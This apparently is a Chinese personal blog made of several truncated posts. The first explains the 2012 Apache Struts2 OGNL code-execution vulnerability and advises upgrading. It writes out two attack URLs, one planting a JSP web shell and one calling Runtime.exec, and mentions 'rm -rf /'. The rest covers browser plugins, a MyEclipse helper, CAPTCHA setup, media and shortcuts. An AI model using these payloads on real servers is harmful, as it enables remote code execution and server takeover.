刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞,具体的漏洞说明地址https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt还是热乎的,我大概白话一下。这个漏洞的级别很高,都升级修补一下。影响版本是2.3.1和2.3.1之前的版本解决办法是升级2.3.1.1漏洞原理(自己理解的)Struts2的核心是使用的WebWork,处理Action时通过ParametersInterceptor(参数过滤器)调用Action的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL语句。例如处理请求配置这样<action name="Test" class="example.Test"> <result name="input">test.jsp</result></action>通过ONGL就可以转换成/Test.action?id=’%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b’oh!god!系统权限就有了,想干什么,就可以干什么了。或者这样/Test.action?id=’%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec(‘calc’))%2b’想执行什么就可以执行什么了。比如 rm –rf /root..我根据说明做了一下测试jdk:1.6struts:2.2.1代码如下:struts.xml 1:<?xmlversion="1.0"encoding="UTF-8" ?> 2:<!DOCTYPEstrutsPUBLIC 3:"-//Apache Software Foundation//DTD Struts Configuration 2.0//EN" 4:"http://struts.apache.org/dtds/struts-2.0.dtd"> 5:<struts> 6:<packagename="default"namespace="/"extends="struts-default"> 7:<actionname="test"class="me.dapeng.action.Test"> 8:<resultname="input">test.jsp</result> 9:</action> 10:</package> 11:</struts>Test.java 1:package me.dapeng.action; 2: 3:import com.opensymphony.xwork2.ActionSupport; 4: 5:/** 6: * 7: * @ClassName:Test.java.java 8: * @ClassDescription:测试Struts2漏洞 9: * @Author:dapeng 10: * @CreatTime:2012-1-9 下午1:45:36 11: * 12: */ 13:publicclass Test extends ActionSupport { 14:long id; 15: 16: @Override 17:public String execute() throws Exception { 18: System.out.println("execute input"); 19:return"input"; 20: } 21: 22:publiclong getId() { 23:return id; 24: } 25: 26:publicvoid setId(long id) { 27:this.id = id; 28:…
从用电脑开始一直用的是世界之窗的浏览器,从1.0的版本用到了3.5,自从世界之窗进入360后,也一直保留着世界之窗的使用,无论是360还是世界之窗,在win7上面都存在这样那样的bug,一直没有修复,而且世界之窗和360的软件版本都比不上世界之窗2的好用,只是现在在速度、网络、服务上面,世界之窗2的版本也只能怀念的软件了。目前我使用的搜狗浏览器,使用的皮肤是世界之窗3的皮肤,看起来亲切,用起来还不错,自动填表的功能很强大,在两种模式下面基本都可以使用,比起其他多核浏览器好多了。我常常打开多个同一网址,做测试用的多,搜狗浏览器里面没有这个功能,很麻烦,要复制网址,打开新标签,粘贴,回车,才完成,在世界之窗浏览器中一直有这个功能,很方便,相当好用,搜狗浏览器少了这个功能很不爽啊!提给官方,谁还不知道鸟不鸟你啊!搜狗浏览器采用的是webkit内核,和谷歌浏览器一样,研究了下他们的API,搞了个复制标签的插件出来,我需要的功能也有了,代码也就几行。因为搜狗浏览器和谷歌浏览器的内核一样,API也基本一样,也顺便做了个谷歌浏览器的插件,测试都可以使用的。看看源码搜狗浏览器的 1: sogouExplorer.browserAction.onClicked.addListener(function(tab){ 2: sogouExplorer.tabs.create({ 3: url: "http://baidu.com/", 4: selected: true 5: }); 6: }); 谷歌浏览器的 1: chrome.browserAction.onClicked.addListener(function(tab){ 2: chrome.tabs.create({ 3: url: tab.url, 4: selected: true 5: }); 6: }); 基本一样吧!附件包含谷歌浏览器、搜狗浏览器的插件和源码下载:http://dl.dbank.com/c0eaktfiau
myeclipse7以前都是可以很容易通过link方式来安装eclipse的插件的,自从myeclipse7以后,myeclipse修改的安装配置的方式,直接用link方式安装插件很麻烦,这里找到一个用link方式的插件配置代码的生成器,用这个安装,简单的一米,推荐必备软件。步骤如下1.比如给myeclipse10安装hibernate的插件,我的hibernate插件之前是eclipse3.2的版本安装的里面。在D:toolsMyEclipse 10MyEclipse 10建立myplugins文件,将hibernate插件放入文件中,不要有eclipse的目录。hibernate插件目录如下 D:toolsMyEclipse 10MyEclipse 10mypluginshibernatepluginscom.hudson.hibernatesynchronizer_3.1.9_lclgv1.02.使用MyEclipse插件配置代码生成器,修改里面的路径import java.io.File;import java.util.ArrayList;import java.util.List;/** * *@ClassName : PluginConfigCreator@ClassDescription : MyEclipse插件配置代码生成器@Author : dapeng@CreateTime : 2011-12-18 下午8:39:31 */public class PluginConfigCreator {public PluginConfigCreator() {}public void print(String path) { List<String> list = getFileList(path); if (list == null) { return; } int length = list.size(); for (int i = 0; i < length; i++) { String result = ""; String thePath = getFormatPath(getString(list.get(i))); File file = new File(thePath); if (file.isDirectory()) { String fileName = file.getName(); if (fileName.indexOf("_") < 0) { print(thePath); continue; } String[] filenames = fileName.split("_"); String filename1 = filenames[0]; String filename2 = filenames[1]; result = filename1 + "," + filename2 + ",file:/" + path + "/" + fileName + "\,4,false"; System.out.println(result); } else if (file.isFile()) { String fileName = file.getName(); if (fileName.indexOf("_") < 0) { continue; } int last = fileName.lastIndexOf("_");// 最后一个下划线的位 置 String filename1 = fileName.substring(0, last); String filename2 = fileName.substring(last + 1, fileName.length() - 4); result…
为了防止程序破解系统登录,一般都会采用登录+验证码的措施。kaptcha是我用到的最好用的一个验证码工具,使用非常的简单。瞧瞧我在项目中使用的效果吧!感觉还是很不错的。使用方法:1.当然是下载kaptcha的jar包了kaptaca的地址:http://code.google.com/p/kaptcha/我在下面也提供一个我修改的版本,修改点下面说。2.在web.xml中增加配置 1:<servlet> 2:<servlet-name>Kaptcha</servlet-name> 3:<servlet-class>com.google.code.kaptcha.servlet.KaptchaServlet</servlet-class> 4:</servlet> 5:<servlet-mapping> 6:<servlet-name>Kaptcha</servlet-name> 7:<url-pattern>/kaptcha.jpg</url-pattern> 8:</servlet-mapping>3.在需要的页面进行调用 1:<imgsrc="Kaptcha.jpg"> 2:<formmethod="POST"> 3:<br>验证码:<inputtype="text"name="kaptchafield"><br/> 4:<inputtype="submit"name="submit"> 5:</form>4.验证 1: String key = (String)session.getAttribute(com.google.code.kaptcha.Constants.KAPTCHA_SESSION_KEY); 2: String parm = (String) request.getParameter("kaptchafield"); 3: 4: out.println("验证码的值: " + key+"<br />"); 5: out.println("您输入的值: " + parm); 6: 7:if (key != null && parm != null) { 8:if (key.equals(parm)) { 9: out.println("<b>验证成功</b>"); 10: } else { 11: out.println("<b>验证失败</b>"); 12: } 13: }看看效果来效果还不错的,就是美化不怎么好,好在kaptcha的自定义功能很强,可以根据需要自定义自己的效果。kaptcha的配置属性**Constant****Description****Default** kaptcha.border 是否有边框 默认为yes 我们可以自己设置yes,no yes kaptcha.border.color 边框颜色 默认为Color.BLACK black kaptcha.border.thickness 边框粗细度 默认为1 1 kaptcha.image.width 验证码图片宽度 默认为200 200 kaptcha.image.height 验证码图片高度 默认为50 50 kaptcha.producer.impl 验证码生成器 com.google.code.kaptcha.impl.DefaultKaptcha kaptcha.textproducer.impl 验证码文本生成器 com.google.code.kaptcha.text.impl.DefaultTextCreator kaptcha.textproducer.char.string 验证码文本字符内容范围 abcde2345678gfynmnpwx kaptcha.textproducer.char.length 验证码文本字符长度 5 kaptcha.textproducer.char.space 验证码文本字符间距 默认为2 2 kaptcha.textproducer.font.names 验证码文本字体样式 默认为new Font("Arial", 1, fontSize), new Font("Courier", 1, fontSize) Arial, Courier kaptcha.textproducer.font.size 验证码文本字符大小 40px. kaptcha.textproducer.font.color 验证码文本字符颜色 默认为Color.BLACK black kaptcha.noise.impl 验证码噪点生成对象 com.google.code.kaptcha.impl.DefaultNoise kaptcha.noise.color 验证码噪点颜色 默认为Color.BLACK black kaptcha.obscurificator.impl 验证码样式引擎 默认为WaterRipple com.google.code.kaptcha.impl.WaterRipple kaptcha.background.impl 验证码背景生成器 默认为DefaultBackground com.google.code.kaptcha.impl.DefaultBackground kaptcha.background.clear.from 验证码背景颜色渐进 默认为Color.LIGHT_GRAY light grey kaptcha.background.clear.to 验证码背景颜色渐进 默认为Color.WHITE white kaptcha.word.impl 验证码文本字符渲染 默认为DefaultWordRenderer com.google.code.kaptcha.text.impl.DefaultWordRenderer kaptcha.session.key 放入session的key名称 KAPTCHA_SESSION_KEY kaptcha.session.date…
咱家那些事,讲的都是家庭里面的小事情,里面老妈的角色很像我妈的啊!推荐大家看看。豆瓣地址http://movie.douban.com/subject/6724705/全集的在线地址:http://www.qire123.com/mainland/zaijianaxieshi/广告不少,将就看看吧!在线地址用的百度影音,可以等待百度影音下载到本地后,在本地观看。
I’m Yours 一首很轻松余悦的歌曲,在一个阳光照耀下的时候,听听,很舒服的。Jason Mraz,1977年出生于美国,是一名出色的歌手。而这个小伙子之所以在过去的几年内里成为美国乐坛的焦点人物,除了一副嗓子加弹一手漂亮的吉他外,他还坚持原创,美国人总是格外推崇那种会唱会弹又会创作的音乐人,即使有人说大概这还是美国的个人英雄主义意识在作怪,但一个毋庸置疑的事实是,这种全能的歌手在美国乐坛是越来越少了!落脚加州圣地牙哥并在当地的酒馆表演后,Jason Mraz遇到了对他影响最深远的鼓手Toca Rivera,他多样化的打击鼓乐让Jason Mraz对音乐充满惊奇,他俩在现场的精彩演出也在整个西岸和网络间流传,也因而使Jason Mraz和Elektra唱片公司签下一纸合约。 Jason Mraz“男巫”的绰号是Jason Mraz对自己的形容。没有多少人会对这个形容表示怀疑,毕竟对于一个习惯于在夜酒吧里弹吉他吟唱些充满着迷离忧伤调的男孩,“男巫”这样的形容恐怕是恰到好处。而一旦浮出水面被主流的 Elektra 唱片公司收编后,Jason Mraz仿佛就不太愿意再用“男巫”来形容自己了,他更愿意将自己打造成一个充满着阳光味道的大男孩,宛如自己的音乐风格:混杂着民谣、拉丁与电子。歌词:Well you done done me and you bet I felt itI tried to be chill but you’re so hot that I meltedI fell right through the cracks now I’m trying to get backBefore the cool done run out I’ll be giving it my bestestnothing’s going to stop me but divine interventionI reckon it’s again my turn to win some or learn someBut I won’t hesitate no more no moreIt cannot wait I’m yoursWell open up your mind and see like meOpen up your plans and damn you’re freeLook into your heart and you’ll find love love love loveListen to the music of the moment people, dance and singWe’re just one big family(A la peaceful melody)And it’s our God-forsaken right to be loved loved loved loved lovedSo I won’t hesitate no more no moreIt cannot wait I’m sureThere’s…
notepad++现在是我最常用的文本编辑工具,其中使用的列模式编辑,也是很好使用的。Ctrl-C,Ctrl-X,Ctrl-V,Ctrl-Y,Ctrl-A,Ctrl-F,Ctrl-S,Ctrl-O,Ctrl-N,Ctrl-W,Ctrl-Tab,Ctrl-P,Alt-F4都是基本的快捷键。 整理其他几个快捷键的使用 Ctrl-H 打开Find / Replace 对话框 Ctrl-D 复制当前行 Ctrl-L 删除当前行 Ctrl-T 上下行交换 F3 找下一个 Shift-F3 找上一个 Ctrl-Shift-F 在文件中找 Ctrl-F2 触发书签 F2 到前一个书签 Shift-F2 到下一个书签 F5 打开run对话框 Ctrl-Space 打开CallTip列表框 Tab (selection of several lines) 加入Space Shift-Tab (selection of several lines) 移除Space F11 全屏 Alt-0 折叠全部 Alt-Shift-0 展开全部 Ctrl-U 变为小写 Ctrl-Shift-U 变为大写 Ctrl-Q 块注释/消除注释
片 名 猩球崛起年 代 2011国 家 美国类 别 动作/剧情/科幻/惊悚语 言 英语字 幕 中字文件格式 BD-RMVB视频尺寸 1024 x 576文件大小 1CD片 长 105 Mins导 演 鲁伯特·瓦耶特主 演 詹姆斯·弗兰科 芙蕾达·平托 安迪·瑟金斯 约翰·利特高 布莱恩·考克斯 汤姆·费尔顿简 介2011年,旧金山。为了研究如何治疗老年痴呆症,行内知名的科学家威尔·罗曼(詹姆斯·弗兰科饰)已经攻关研究了多年。试验一直没有取得太大的起色,虽然他和灵长类学家卡洛琳(芙蕾达·平托饰)一起研制了一种名为“Cure”的新药物,这种药物能改变基因,但由于极其危险的副作用,使得他找不到合适的临床试验对象来验证Cure的药性。终于,在科研所的所长(布莱恩·考克斯饰)的怂恿之下,他将药物放在了大猩猩身上。Cure具有自我修复大脑的作用,这在大猩猩身上得到了验证。有了Cure的疗效,大猩猩开始变得超级有智慧,常年被所长虐待的动物们开始报复人类,最先恢复智力的大猩猩凯撒(安迪·瑟金斯饰)开始率领其他猩猩对人类进行反攻倒算,人类不再是地球唯一的统治者,猿族开始逐渐崛起。闯下大祸的威尔·罗曼,决定用他自己的方式来化解这一场人类和猿族之间的战争……电影下载ftp://dygod1:[email protected]:3002/猩球崛起.[中字.1024分辨率]/[电影天堂-www.dy2018.net]猩球崛起BD中字.rmvb